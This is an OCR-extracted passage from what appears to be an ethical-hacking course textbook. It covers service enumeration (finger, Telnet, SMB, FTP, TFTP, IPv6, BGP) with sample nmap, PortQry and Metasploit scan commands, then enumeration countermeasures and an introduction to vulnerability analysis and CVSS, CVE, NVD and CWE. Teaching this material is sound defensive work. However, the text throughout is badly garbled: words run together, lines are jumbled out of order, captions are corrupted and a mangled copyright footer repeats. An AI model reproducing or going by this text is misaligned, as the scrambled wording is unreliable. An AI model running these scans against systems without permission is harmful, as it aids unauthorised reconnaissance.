runningthe rwhodaemon.Its syntaxi s asfollows:
o n the localnetwork
ical andCountermensores
Mackin ©by E-Comel
Copyright
who [ -a]
It hasthefollowing
option.
-a: Includesall users;withoutthis flag,
users whosesessionsare idleforan houror
more are not includedi n the report
finger
finger
displays
information
aboutsystem login
userssuchas theuser’sname, realname,
terminalname,idletime,login
time,officelocation,
andofficephone
numbers.Its syntax
is asfollows:
finger [-1] [-m] [-p] [-s] [user ...][user@host
Theoptionsare as follows.
© -5: Displays
theuser’sloginname, real name, terminalname, idletime, login
time,
officelocation,andofficephone
number
a
-I: Produces multi-lineformat displaying
homedirectory,
optionas well as the user’s homephoneof
all the informationdescribedfor the -s
number, loginshell,mail
the
status,andthe contentsof files “plan,―
the user'shomedirectory
“.pgpkey,―
*.project,―
and
*
forward―
from
Figure4.36:
displaying
Screenshot
ofthe user
theexecution fingercommand for enumeration
ical andCountermensores
Mackin ©by E-Comel
Copyright
Telnetand SMBEnumeration
Telnet Enumeration
Telnetis a networkterminalprotocol
that allowsusers to access remote computersor servers
provides
over the Internet.Thisprotocol two-way interactive communication forcomputers on
LANs
login theremote system
to onprivileges
and the Internet.Dependingthe
assigneduseto
to accessspecific
to the users, theycan
files,services,data,
etc.
Telnet
‘As
shown the following
i n the screenshot,
by to
Nmapcommandis used attackers enumerate the
Telnetservice runningon the targetsystem:
# nmap ~p 23 <target domain>
ical andCountermensores
Mackin ©by E-Comel
Copyright
Indicatesthat port23 i blockedbya firewall
other network obstacle
‘orsome
Figure437:Screenshot
Attackerscan further use the following
displaying
of Nmap a Telnet
enumeration result
showni n thescreenshot,
‘As use thefollowing
attackers Nmapcommand to enumerate theSMB
service runningon the targetIPaddress:
# nmap -p 445 -A <target IP>
In the abovecommand,the option~p specifies
is usedfor OSdetection,
a portto scan (445in this
case),
andoption~A
scriptscanning,andtraceroute information.
version detection,
ical andCountermensores
Mackin ©by E-Comel
Copyright
“|
Openport445
SMBdetails
438:Screenshot
Figure of Nmap SMB
performing enumeration
ical andCountermensores
Mackin ©by E-Comel
Copyright
FIP and TFTPEnumeration
mv oh ey nn oe
= See)
FTPEnumeration
The
Transfer
Protocol
(FTP)
File
to
transfer
plaintext, default
dataare transferred
is used
betweena senderandreceiver
suchas usernamesandpasswords to attackers.
files over TCP,
in
andits ports 21.In FTP,
exposingcriticalinformation
FTPoffersneithera secure networkenvironment
do
nor secureuser authentication.
a network.Thisprovides
Individuals not needauthentication
an easymethodfor attackers
to accessan FTPserver i n
to accessnetworkresources.
Theimplementation of FTPi n an organization's
networkmakesthe dataaccessible to external
sources. Attackerscan scan andenumerate open port21 runningFTPservices andfurtheru se
this informationto launchvarious attackssuchas FTPbounce, FTPbrute force,and packet
sniffing,
Asshown in thescreenshot, the following
the FTPservice runningon the target
Nmap
domain:
command
by to
i s used theattackers enumerate
ical andCountermensores
Mackin ©by E-Comel
Copyright
Indicatesthat port 21is blockedbya
firewallor some othernetworkobstacle
Figure439:Screenshot
Attackersalsouse Metasploit
of Nmap
a
dslayingFPenumeratione st
to enumerate FTPservices runningo n remote hosts.Thefollowing
commands can beusedto detecttheFTPversion ofthe targetserver:
use
auxiliary/scanner/ftp/ftp_version
msf
msf
auxiliary
(scanner/ftp/ftp_version)
(scanner/ftp/ftp_version)
auxiliary
> set RHOSTS <target IP>
> exploit
‘TFTP
Enumeration
TheTrivialFileTransferProtocol(TFTP)is a simplified andis usedfor transferring
version of FTP
filesbetweennetworkdevices.Bydefault, TFTPservers listenon UDP port69. Thisprotocolis
usedwhendirectory visibility therefore,
anduser authenticationa re not required; It provides
no
securityfeatures.
To perform TFTPenumeration,attackerscan use toolssuchas PortQry and Nmap to extract,
informationsuchas runningTETPservices and filesstoredon a remote server. Byusingthe
enumeratedinformation, attackerscan further gain unauthorizedaccess to the targetsystem,
stealimportantfiles,and upload maliciousscriptsto launchfurtherattacks.Furthermore, this
informationenablesattackersto perform
reflection
attacks,andDDoSattacks.
various
attacks
suchas DNSamplification attacks,TFTP
=
Portary
Source:https://www.microsoft.com
The PortOry utilityreports
the portstatus of TCP and UDP portson a selectedtarget.
Attackerscan use the PortQrytool to performTFTPenumeration. Thisutilityreports
the
of
portstatustarget
a or
TCPandUDPportson local remotecomputer.
In the
PortQry
on openporttool,
69. specify
by shown
As targeta on
theattackersc an
screenshot,
attackers
in the
the
the to scan for runningTFTPservice
perform TFTPenumeration
targetdomain
settingthePorts to query: valueto 69 andProtocol to UDP.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ar
440: Screenshotofthe
Figure
Poetry
tool a TFP
dsplaying seanresult
8
Module 470
Page tical andCountermensores
Making by Comet
Copyright©
Attackerscan alsouse the PortQry
command-line
utilityto perform
TFTPenumeration
using
the command:
portary
following
-n <target domain> -e
69 -p udp
at:
Figure Screenshotofthe Portry commandlineult showing
a TFTP
scan result
+
Nmap
Source:https://nmap.org
can use the Nmap
‘Attackers tool to perform
simple
directscanningfor TFTP
port69.As
showni n the screenshot,
theTETP
thefollowing
service runningon the target
Nmapcommand
by to
is used attackers enumerate
domain:
# nmap -p 69 <target domain>
some
ather by
a
obstacle
cor
port69sblocked rewl
Indicates thatthe
network
gure
442:of
NmapaTFTP
Screenshot command displaying
scan
ical
result
andCountermensores
Mackin ©by E-Comel
Copyright
IPv6Enumeration
IPvé
Enumeration
InternetProtocolversion 6 (IPv6) is an addressing protocol that identifiescomputer systems,
includinglocationinformation, andassistsi n routingtrafficfromone system to another
system
acrossa network.Its an advanced version of IPv4and,therefore, supports a greaternumberof
hostsascompared
Attackers perform
to IPv4. It was designed to overcome the problem
address
exhaustio
of IPv4
IPv6enumeration on targethoststo obtaintheirIPV6addresses andfurther
scan the enumeratedIPaddresses problems
to detectvarious security suchas access to routing
structure,
sensitive
content, using
of
exposure andusers’accesscontrol
iss. By
attackerscan launchvarious attackssuchas SYNflood attacks,
DDoSattacks.
thisinformation,
ONSamplification
Attackerscan scan andenumerate the IPv6address
attacks,
of a targetmachine
and
i n the
network
=
various Hackit.
byusing
Enyx
tools suchas Enyx
andIPv6
Source:https://aithub.com
an
{Asof tool
that
fetches
the
IPv6
address
Enyxiisenumeration
the
following SNMP.
shownin the screenshot,
attackersuse
through
of a machine
command to enumerate the
community by
a setting
version
IPv6 addresstarget machine(10.10.10.20) the SNMP to 2e
and stringto pubLie:
Pythonenyx.py 2c public <target IP>
ical andCountermensores
Mackin ©by E-Comel
Copyright
IPv6Hackit
Source:http://ipvéhackit.sourceforge.net
Hackitis a scanningtool that provides
a list of active IPv6hosts.It can perform
TCPport
scanningandidentify AAAAIPv6hostrecords.
showni n the screenshot,
‘As attackerscan specify the targetmachineand run a scan to
the IPv6 information.
‘enumerate
444:
Figure Sceenshotdisplaying
the Pus Hackl
ical
tool
BGPEnumeration
The BorderGateway Protocol(BGP) is a routingprotocol used to exchange routingand
reachability
information betweendifferentautonomous systems (AS) on the Internet.Because
is usedto connect one ASto other ASs,
this protocol itis alsocalledexternalBGP(eBGP). BGP
findstheshortest
TCPsessionon port179, to
pathto routetrafficfromone IP address anotherefficiently. BGPcreates its
Attackersperform
discover
BGPenumeration on the targetusing toolssuchas Nmap
the IPv4prefixes
andBGPToolkit
bythe ASnumberandthe routingpathfollowedbythe
indicated
target.Attackersuse thisinformationto launchvarious attacksagainst
the target,suchas man-
to
in-the-middleattacks,BGPhijackingattacks,andDoSattacks.
Asshownin the screenshot, attackersuse the following
Nmap
commandto enumerate BGP
running o n the target
system
# nmap -p 179 <target IP>
445: Screnshat
Figure of Nmap
di ing 8G?enumerationresut
ical andCountermensores
Mackin ©by E-Comel
Copyright
Asinthe
shown
use
forto
Toolkitperforrn
attackers BGP
screenshot,
domain.Thisonlinetool can beusedto search the target
DNSinformation, websiteinformation, IP information,
BGP
the
enumerationo n target
domainandobtaindetailssuchas
ASinformation, andwhoisinformation,
Basedo n the identifiedASs,
attackerscan further enumerate detailssuchas IPv4prefixes,
BGP
graphs,
routing andIPv4peers.
WARRING
(=e
PaaeTAL
a
my TONNE
AW haatpi
Figure446:
Screenshot
of86PToolkit
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
[NetBIOS
Enumeration
LDAPEnumeration ‘Enumeration
Countermeasures
Enumeration Countermeasures
SNMP DNs
thedeft commonty
‘hone sng names
Donotmiscontgure
SNMPservice wthead
ical andCountermensores
Mackin ©by E-Comel
Copyright
EnumerationCountermeasures(Cont'd)
tm
NFS FIP
Implement
parison
rer eadwe must Inlet
sere
(SFR
wnSS
or ves
Enumeration Countermeasures
Thusfar,we have describedenumeration techniques and tools used to extract valuable
Informationfromtargets.Next, we discusscountermeasures that can preventattackersfrom
enumerating sensitive informationfrom a networkor host.Thissection focuses
o n methodsto
avoidinformationleakage throughSNMP, DNS,SMTP, LDAP,SMB,NFS, andFTPenumeration.
ical andCountermensores
Mackin ©by E-Comel
Copyright
SNMPEnumerationCountermeasures
+
+
Remove
Ifturning
SNMP offSNMP
service,
the SNMPagentor turn
option, community
off is not an
the
then change
thedefault stringnames
+
Upgrade
to SNMP3, passwords
whichencrypts andmessages:
Implement
theGroup
Policy optioncalled“Additional
security restrictions foranonymous
connections.―
Ensurethat the access to null session pipes, null session and IPsecfiltering
shares, is
restricted.
access
Block
port
TCP/UDP
161.
to
Donot installthe management
andmonitoring unlessrequired.
Windowscomponent
‘=
=
Encrypt
Donot
or
using
authenticate
SNMP
misconfigure the
IPsec.
servicewithread-writeauthorization.
DNSEnumeration
Countermeasures
Disable DNSzone transfersto untrustedhosts.
‘=
Ensurethat the privatehostsandtheir IP addresses are not published
i n the DNSzone
filesofthepublicDNSserver.
UsepremiumDNSregistration services that hide sensitive information suchas host
fromthe public.
information(HINFO)
Usestandard
networkadmincontactsfor DNSregistrations
to avoidsocialengineering
attacks
Prune DNSzone filesto revealing
prevent unnecessaryinformation,
Enumeration
‘SMTP Countermeasures
SMTPservers shouldbeconfigured
in the following
manner.
+
Ignore
emailmessages
to unknownrecipients.
+
Excludesensitive informationon mailservers andlocalhostsi n mailresponses
*
Disablethe open relay
feature.
+
of accepted
Limit thenumber preventbrute-force
connectionsfroma source to attacks.
‘Disable
EXPN, VRFY,andRCPTTOcommandsor restrict themto authenticusers
+
Ignore byconfiguring
emailsto unknownrecipients SMTPservers,
LDAPEnumeration
Countermeasures
By default,
LDAPtraffic is transmittedunsecured;therefore,
use Secure Sockets
Layer
(SSL) technology
or STARTTLS the traffic.
to encrypt
Selecta username differentfromtheemailaddressandenableaccount lockout,
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
byusingsoftware
Restrictaccessto ActiveDirectory suchas Citrix.
=
to limit accessto legitimate
UseNTLMor any basicauthenticationmechanism users.
SMBEnumeration
Countermeasures
Common sharing services or otherunusedservices mayprovide doorways for attackersto break
into a network'ssecurity, A networkrunningSMBis at a high riskofenumeration.Sinceweband
DNSservers do not require this protocol,
it is advisableto disableit o n them. TheSMBprotocol
can bedisabledbydisabling ClientforMicrosoft
the properties NetworksandFileandPrinter
Sharing
for MicrosoftNetworks i n Network and Dial-up Connections.On servers that are
accessible fromtheInternet, alsoknownas bastionhosts,SMBcan bedisabledbydisabling the
same two properties of the TCP/IPproperties
dialogbox.Anothermethodof disabling theSMB
protocol on bastion
hosts,without explicitly
disabling the portsusedbytheSMB
it, is byblocking
service. Theseare TCPports139and445,
Becausedisabling SMBservices is not always a feasibleoption,other countermeasures against
SMBenumeration maybe required. WindowsRegistry can be configured to limit anonymous
access fromthe Internet to a specified
set of files.Thesefilesandfoldersare specified i n the
Networkaccess: Named
settings anonymously
pipesthat can beaccessed andNetworkaccess:
Sharesthat can be accessedanonymously.
This configuration
involves addingthe
RestrictNullSessAccess key:
to the registry
parameter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanSe
The RestrictNullSessAccess parametertakes binaryvalues,with 1 denoting
enabledand 0
denoting
disabled.
Settingto
1or
to the filesspecifiedenabled the anonymous
thisparameter
i n the Networkaccesssettings.
of
restricts access users
following
The are defending
additionalcountermeasuresfor SMBenumeration,
against
=
Windows
Firewall
system.similar
Ensurethat
protection
endpoint or are enabled
systems on the
patches
Installthe latestsecurity for Windowsandthird-party
software.
Implementa proper authenticationmechanismwith a strongpassword
policy.
Implementstrongpermissions to keep
the storedinformationsafe.
Perform
a regularaudit of systemlogs.
=
Performactive system to monitor the systems
monitoring for anymalicious
incident.
NFSEnumeration
Countermeasures
+
Implement proper permissions (read/write must be restrictedto specific
users)
in
exportedfile systems,
Implement firewallrulesto blockNFSport2049,
Ensurethe proper configuration
‘=
of filessuchas /etc/smb conf,/etc/exports,and
etc/hosts. allow to protectthedatastoredin the server.
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
to accessthesystem
Logthe requests fileson theNFSserver.
=
Keep the reot_squash optionin /etc/exports file turnedONso that no requests
madeas root on theclientare trusted
‘=
Implement through
NFStunneling theNFStrafficover the network.
SSHto encrypt
FTPEnumerationCountermeasures
=
Implement
secure FTP(SFTP,
whichuses SSH) secure (FTPS,
or FTP whichuses SSL)
to
theFTPtrafficover thenetwork.
encrypt
Implement
strongpasswords or a certification-based
authenticationpolicy.
Ensurethatthe unrestricteduploading
of fileso n the FTPserver is not allowed.
Disable
FTP isnot monitor
regularly. FTP
anonymous accounts.
f this possible, anonymous
accounts
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
1 mod,
inthis we have
Howattackers
perf enumeration
sing diferenttechniques SNMP,
(NetBIOS,
16, t gather
andGP enumeration) more Information
about2a
inthe
next module,
we wildass in detailh ow
nd pentesters,perform
vulnerability
anasto attackers,
entias 6
secur
well ethicalhackers
loopholesinthe
Module Summary
In thismodule,we discussed
theenumeration concepts alongwiththe techniques,
services,and
ports used for enumeration. We have also discussedhow attackersperformdifferent
enumeration techniques (NetBIOS,
SNMP,LDAP, NTP,NFS,SMTP,DNS,IPsec, VoIP,RPC,
Linux/Unix,Telnet,
FTP,TETP,SMB,IPv6,andBGPenumeration) to gatherinformationaboutthe
target.Thismoduleendedwitha detaileddiscussion on thecountermeasuresthatorganizations
can adoptto defendagainst
enumeration activities.
In the next module, i n detailhow attackers,
we will discuss as well as ethicalhackersand pen
testers,perform
vulnerability
analysisto identify loopholes
security in the targetorganization’s
network,communication infrastructure,
andendsystems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
|
Certified Ethical Hacker
—< Module05:
Vulnerability
Analysis
Module Objectives
‘overview
of VunrabityManagement
Understanding
Valou yes ofVulnerableandVerity
Asetsment
Li e Cyle(Vunrabity Phases)
AssesmentT echniques
Module Objectives
In today’s
world,organizations depend heavilyon informationtechnology
for protecting
vital
information.
Thisinformation with areas of finance,
i s associated researchand development,
personnel,
legality, Vulnerability
and security. assessmentsscan networksfor knownsecurity
weaknesses.
Attackers performvulnerability analysis to identifysecurityloopholes
i n the target
organization’snetwork, communicationinfrastructure, andend systems.The identified
vulnerabilitiesare usedbyattackersto furtherexploit
that targetnetwork.
Vulnerabilityassessmentplays a major role i n providing
security to any organization's resources
and infrastructure from various internalandexternalthreats.To secure a network, an
administratorneedsto perform patchmanagement, install proper antivirus software, check
configurations,solveknownissuesi n third-party applications,andtroubleshoot hardware with
defaultconfigurations.
All
theseactivities
together
a constitutevulnerability
Thismodulestarts with an introductionto vulnerability assessmentconcepts.
assessment,
It alsodiscusses
the various vulnerability
scoringsystems, vulnerability
databases, vulnerability
management life
cycle,and various approaches and tools used to perform vulnerability assessments.This
modulewill provide knowledge aboutthetoolsandtechniques usedbyattackersto perform a
quality vulnerability
analysis.It concludeswith an analysis of the vulnerability assessment
reportsthathelp
an ethical
hacker
to fix the identified
vulnerabilities.
ical andCountermensores
Mackin ©by E-Comel
Copyright
At theendof thismodule,
youwill beableto:
© Understand research,
vulnerability vulnerability andvulnerability
assessment, scoring
systems
thevulnerability
Describe management lifecycle(vulnerability
assessmentphases)
Understandvarious typesof vulnerabilitiesandvulnerability
assessmenttechniques
differentapproaches
Understand to vulnerability
assessmentsolutions
Describe of good
differentcharacteristics vulnerability
assessmentsolutions
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Valnerabilty Concepts
Assessment
aseetment
Typee
Classification
‘Vulnerability and
Assessment
Reports
‘Vulnerability
Vulnerability Concepts
Assessment
Thereare generallytwo main causesforvulnerablesystems in a network, softwareor hardware
misconfigurationand poor programming practices. Attackersexploit thesevulnerabilitiesto
perform
vulnerability
assessment,
vulnerability
assessmentlifecycle.
on
various typesofattacks organizational
vulnerability
resources. Thissection givesan overview of
scoring systems, vulnerabilitydatabases, and the
ical andCountermensores
Mackin ©by E-Comel
Copyright
Research
Vulnerability
(a. T heproces of analying
an
operating
thatwil expore
“©
Vuinerabltiesare and discover
vulnerable
protocol,services, andconfiguration
appletons
explo,
sytem ts
classedbased
to
level(low,
on severity
to
aac, or misuse
or igh)andexplot
medium,
and design
ange(eal or
flaws
remote)
Anadministrator needsvulnerability
research:
trends,
threat,attacksurfaces,
andtechniques
attack vectors
Tegather
information oad intheprevention
af
se
BD ciscoverw eknessesin
aplaton
Bitar
te
ad alertnetwork
before
a network
ak
0Sa
“know
how
om
a to recover networkstack
‘Vulnerability
Research
Vulnerability
researchis the processof analyzing protocols,services,and configurations
to
discoverthe vulnerabilitiesand design flawsthat will expose an operating systemand its
applications
‘An
to
exploit,attack, or misuse.
administratorneedsvulnerability research
+
To gather informationabout securitytrends, newly discovered threats,
attacksurfaces,
attackvectors andtechniques
To find weaknesses i n the OSand applications and alert the networkadministrator
beforea network attack
=
Tounderstandinformation
that helps problems
preventsecurity
=
Toknowhow to recover froma networkattack
ethicalhackerneedsto keepup with the most recently
‘An discoveredvulnerabilitiesand
exploits
to stayone stepahead through
ofattackers vulnerability whichincludes:
research,
faultsand weaknesses
Discoveringthe systemdesign that mightallow attackersto
compromise a system
updated
Staying about new products and technologies
and reading news related to
current
exploits
Checking
underground hacking web sites(DeepandDarkwebsites) for newlydiscovered
vulnerabilities
andexploits
Checkingnewlyreleased alerts regarding relevant innovations and product
improvements for securitysystems
ical andCountermensores
Mackin ©by E-Comel
Copyright
Securityexpertsandvulnerability
scannersclassify
vulnerabilities
by:
=
Severitylevel(low,medium, or high)
=
range (localor remote)
Exploit
Ethicalhackersneedto conductintense researchwith the helpof informationacquired
i n the
footprinting
andscanning phases to findvulnerabilities,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Resourcesfor Vulnerability
Research
Dy,wees semumerine
a « eText Maenine
>= ae
Resourcesfor Vulnerability
Research
Thefollowing
+
are some
of
the onlinewebsitesusedto perform
MicrosoftVulnerability (https://www.
(MSVR)
Research
vulnerability
microsoft.com)
research:
*
DarkReading(https://www.darkreading.com)
SecurityTracker(https://securitytracker.com)
+
TrendMicro(hetps://www.trendmicro.com)
Security
Magazine (https://www.securitymagazine.com)
PenTestMagazine (https://pentestmag.com)
SCMagazine(https://www.scmagazine.com)
Exploit
Database (https://www.exploit-db.com)
(httes://www.securityfocus.com)
SecurityFocus
Help (https://www_helpnetsecurity.com)
Net Security
HackerStorm(http://www.
hackerstorm.co.uk)
Computerworld(https://www.computerworld.com)
WindowsSecurity(http.//www.windowsecurity.com)
(https://www.d-crypt.com)
D’Crypt
Module
5 488
Page ical andCountermensores
Mackin
©
by
Copyright E-Comel
Assessment?
What is Vulnerability
{©Vuloerabtty
curt
assessmenti s anin-depth
procedures examination
ofthe
the of abit system
andcontra, withstand exlatation
or appliation
including
current
(©Ierecognzes,
and
messures, andclsies securty vulnerable na computer
sytem,network, communication
beusedto
‘may ‘vulnerability
scanner includes:
Whatis Vulnerability
Assessment?
A.vulnerability
including
assessmentis an in-depth
current security
for knownsecurity
procedures
weaknesses,
examination of the ability a system
andcontrols,
and recognizes,
to withstand
measures,
exploitation.
andclassifies
of
or application,
It scansnetworks
security vulnerabilities
i n computersystems,networks, and communication channels. quantifies,
It identifies, and
rankspossiblevulnerabilitiesto threatsi n a system.Additionally,
it assistssecurity professionals
insecuringthe network byidentifying securityloopholes
or vulnerabilitiesi n the current
mechanism
security beforeattackersc an exploit
them.
vulnerability
assessmentmay beusedto:
Identify weaknessesthatcouldbe exploited
=
Predictthe effectiveness
of additionalsecuritymeasures i n protecting
information,
resourcesfromattack
Typically,
vulnerability-scanning
tools searchnetwork segments for IP-enableddevicesand
enumerate systems,
operatingsystems, and applications
to identifyvulnerabilities
resulting
fromvendornegligence, or day-to-day
systemor networkadministrationactivities, activities.
\Vulnerability-scanning
softwarescans the computeragainstthe CommonVulnerability
and
Exposures
(CVE) bulletinsprovided
indexandsecurity bythesoftwarevendor.
Vulnerability of identifying
scanners are capable the following
information:
‘=
The0S versionrunningon computers
or devices
=
IPandTransmissionControlProtocol/User
Datagram (TCP/UDP)
Protocol portsthat are
listening
Applications
installedon computers
ical andCountermensores
Mackin ©by E-Comel
Copyright
Accountswithweakpasswords
Filesandfolderswith weakpermissions
Defaultservices andapplications
that might
haveto beuninstalled
Errors i n the securityconfiguration
of common applications
exposed
Computers to knownor publicly
reported
vulnerabilities
EOL/EOS
softwareinformation
Missing
patchesandhotfixes
Weaknetworkconfigurations
andmisconfigured
or risky
ports
Help
to verify
of
the inventoryall devices on the network
Therk
1¢ approaches
are two
Active Scanning:
to
networkvulnerabilityscanning:
The attacker interacts directlywith the target network to find
vulnerabilities.Active scanninghelps i n simulating
an attackon the targetnetworkto
uncover vulnerabilities thatcan beexploited bytheattacker.
Example:
An attackersendsprobes
and specially
craftedrequests
to the targethostin
the network
to identify
vulnerabilities.
PassiveScanning: The attacker
tries to findvulnerabilities
withoutdirectly interacting
with the targetnetwork.Theattackeridentifiesvulnerabilitiesvia informationexposed
bysystemsduringnormalcommunications. Passivescanningidentifiesthe active
operating systems,applications,
and portsthroughout the targetnetwork, monitoring
Thisapproach
activityto determineits vulnerabilities. provides informationabout
weaknesses butdoesnot providea path for directly
combating attacks.
Example:
An attackerguesses systeminformation,
the operating applications,
and
andservice versions byobserving
application the TCPconnection setupandteardown.
Attackersscan for vulnerabilitiesusing tools such as Nessus,Qualys, GFl LanGuard,and
OpenvVAs.Vulnerability scanningenablesan attackerto identify
networkvulnerabilities,
open
portsand runningservices, applicationand services configuration
errors, and application
and
icevulnerabilities.
of Vulnerability
Limitations Assessment
f
The following
Vulnerability-scanning
ofvulnerability
are some ofthelimitations assessments:
softwareis limitedin its ability
to detectvulnerabilitiesat a given
point i n time
Vulnerability-scanning
softwaremust be updated when new vulnerabilities
a re
discovered are madeto the softwarebeing
or whenimprovements used
Softwareis onlyas effectiveas the maintenance performed
on it bythe softwarevendor
andbythe administratorwho usesit
Vulnerability doesnot measure the strength
Assessment of security
controls
05
Module Page£90 ical andCountermensores
Mackin
©
Copyright
by E-Comel
softwareitselfis not immune to software
Vulnerability-scanning engineeringflawsthat
might
leadto it missingserious vulnerabilities,
Human judgment is neededto analyze the dataafter scanningand identifying
the false
andfalsenegatives.
positives
Themethodology usedmighthave an impacto n the test results.Forexample, vulnerability
scanningsoftware that runs underthe security
context ofthedomain administratorwill yield
differentresultsthansoftwarethat runs underthe security
context of an authenticatedor non-
authenticateduser. Similarly,diversevulnerability-scanning
softwarepackages assesssecurity
differently
andhaveuniquefeatures.Thiscan influencethe assessmentresults.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
Scoring
Systems
and Databases
eenmrT,
|©aneny
| swnsquanttatve modeler esto ven the
.
ae cade cere
“e 708s
j
Scoring
Vulnerability and Databases(Cont'd) (CEH
Systems
Valnerabilitiesand
Exposures
(CVE)
avaiable
‘Apublidy
{ree-to-use
ditionaryof
listof
and
SearchResults
software
standardized identifiers
for common
vulnerabiitiesand
‘exposures
Gz
05
Module £92
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
j
Vulnerability
Scoring and Databases(Cont'd)CEH
Systems
Vulnerability
National Database (NVD)
NST
government
© AUS.
repository
af ||
base vulnerability
represented
using
‘Automation
management
the Security
Protocol
SCAP)
standards:
data
Content
ann
data
hese
theof
vulnerability
management,
enable automation
measurementa ndcompl
secuty
heNVDincludes
database
ofsecurity
Software
flaws, msconigurations,
names,a ndimpact
meres
product
NVD
j
Scoring
Vulnerability and Databases(Cont'd) (CEH
Systems
Common
Weakness
Enumeration
(CWE)
‘category
syst
software
vanerailties
for and
by
the
ts sponsored NationalCybersecurity
ofThe
MITRE
FFROC, which ownedby Corporation,
swithsupport
fom US-CERT andthe
National
Cyber
Division he U.S.
‘Security of
Department
Homeland
Security
thasover 600catogories
ofweaknesses,
ich
‘community
35a baseline
forweakness
‘dentifeation, andprevention
mitigation, afforts
QWE
3
‘Vulnerability
ScoringSystems and Databases EReeSR
of cyber-attacks,
Dueto the growingseverity vulnerability
research
hasbecome
criticalas it
helps the chanceof attacks.Vulnerability
to mitigate researchprovides
awareness of advanced
techniques
to identify
flawsor loopholes that can beexploited
in the software byattackers.
Vulnerability andvulnerability
scoring systems are usedbysecurity
databases analysts
to rank
information
system andto provide
vulnerabilities score oftheoverallseverity
a composite and
ical andCountermensores
Mackin ©by E-Comel
Copyright
Vulnerability
riskassociatedwith identifiedvulnerabilities. databases
collect and maintain
informationaboutvarious vulnerabilitiespresent
i n informationsystems,
Following
are some of the vulnerability anddatabases:
scoringsystems
Common
=
Vulnerability
Scoring
System (CVSS)
=
Common
Vulnerabilities
Exposures
and (CVE)
=
=
Vulnerability
National
Weakness
Common
(CWE)
(NVD)
Database
Enumeration
Common Vulnerability
Scoring (CVSS)
System
Source:https://www
first.org, https://nvd.nist.gov
CVSSis published
a standardthat provides an open frameworkfor communicating the
characteristics The system's
and impactsof IT vulnerabilities. quantitativemodelensures
repeatable, accurate measurement while enabling users to see the underlyingvulnerability
characteristicsthat were usedto generate the scores. Thus,CVSSis well suitedas a standard
measurement system for industries,
organizations,and governments that needaccurate and
consistent vulnerabilityimpactscores.Twocommon uses of CVSSare prioritizing vulnerability
remediationactivities and calculating the severityof vulnerabilitiesdiscoveredon one’s
systems.TheNational
vulnerabilities.
Vulnerability
Database (NVD) provides CVSS
for
scores almostallknown
CVSS
to
helps
representation
a
capturethe principal
reflectits severity.
(such
This numerical
as low,medium,
of vulnerability
characteristics
score can thereafter
high,or critical)
to help
andproduce
organizations
a numerical
properly
score
be translatedinto a qualitative
assess and
prioritize
CVSSvulnerability
processes.
consists
ofthe
their
metrics
management
vulnerabilities:
assessment three for measuring
+
‘+
qualities
BaseMetric: Representsinherent
Temporal
of a vulnerability
the featuresthat continue to change
Metric: Represents during
the lifetimeof
thevulnerability
EnvironmentalMetric: Represents are basedon a particular
vulnerabilitiesthat
Each
environment
or
implementation.
metric setsa score from110, with 10being
the most severe. TheCVSS s core is calculated
andgenerated bya vector string,whichrepresents
the numericalscore for eachgroup i n the
formof a block of text. TheCVSS
calculatorranksthe security andprovides
vulnerabilities the
andriskrelatedto the vulnerability
Userwith informationon theoverallseverity
Severity
Nor
BaseScoreRange
0.0
low 0139
‘Medium 4069
ical andCountermensores
Mackin ©by E-Comel
Copyright
High
Critical
7.089
90-100
Table $3:
CVSS 3.0
ratings
Severity
low
BaseScoreRange
0.03.9
Medium
High
40-69
7.0-10
Table5.2:
CVSS
v2.0atings
§@
CommonVulnerability
Scoring Calculator
System CVE-2017-0144
Exploitability
Metrics
peace
Comoienty
rg ea
eae
ney mse
imc
ical andCountermensores
Mackin ©by E-Comel
Copyright
are assigned byCVENumbering Authorities
(CNAs) fromaroundthe world,ensures confidence
amongpartieswhen discussing or sharinginformationabout a unique softwareor firmware
vulnerability.CVEprovides for tool evaluationandenablesdata exchange
a baseline for
cybersecurity
organization's
automation. CVEIDsprovide
services so that userscan determine
needs.In short,products
a baselinefor evaluating
What
CVE
is:
identifieror
=
One
exposure
for one vulnerability
=
description
Onestandardized
rather
Adictionary
=
than
adatabase
or
exposure for eachvulnerability
=
disparate
Amethodfor “speak―
language
databasesandtoolsto thesame
=
Thewayto interoperability
andbettersecuritycoverage
‘A
basis
Free among
for evaluation
public
forthe to download
services,
and use
tools,
anddatabases
Industry-endorsed Numbering
via the CVE Authorities,
CVEBoard,
and the numerous
products
andservicesthat includeCVE
Search Results
‘here
are
444
CVEentries that matchYoursearch
Descript
equests subject
toa relay attack
and allows
kyoceraCommandCenterRXTASKalf94501\ TASKalfa50S2<
remote at
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘abnrabiy
Analy
National Vulnerability
Database (NVD)
Source:https://nud.nist.gov
‘The
NVD is the U.S.government vulnerability
ofstandards-based
repository data.
management
It usesthe Security
ContentAutomationProtocol(SCAP).
Suchdataenablethe automation of
vulnerability
management, and compliance.
measurement,
security The NVD includes
databases checklistreferences,
of security softwareflaws,misconfigurations,
security-related
product
names,andimpact metrics.
TheNVDperforms an analysison CVEs thathavebeen published to the CVEDictionary.
NVD
staff are taskedwith the analysis of CVEsbyaggregating data pointsfrom the description,
references andanysupplemental
supplied, datathatare publicly available.Thisanalysis
results
In association impactmetrics (Common Vulnerability ScoringSystemCVSS), ~
vulnerability
types(Common Weakness Enumeration CWE),
—
NisT
WCVE-2019-6452
Det
Current Description
Figure3: showing
Screenshot CVEdetails
intheNational
ulnerabiltyDatabase
(VD)
Module
05 £97
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Common WeaknessEnumeration (CWE)
Source:httpsi//ewe.mitre.org
CommonWeakness Enumeration(CWE) is a categorysystemforsoftwarevulnerabilities and
weaknesses.It is sponsored bythe NationalCybersecurity FFRDC, whichis ownedbyTheMITRE
Corporation,with support from US-CERTand the NationalCyber SecurityDivisionof the U.S.
Department of HomelandSecurity. Thelatestversion 3.2of the CWEstandardwas releasedin
January 2019. It hasover 600 categories of weaknesses, whichgivesCWEthe ability to be
effectively
employed bythe community as a baselinefor weaknessidentification,
mitigation,
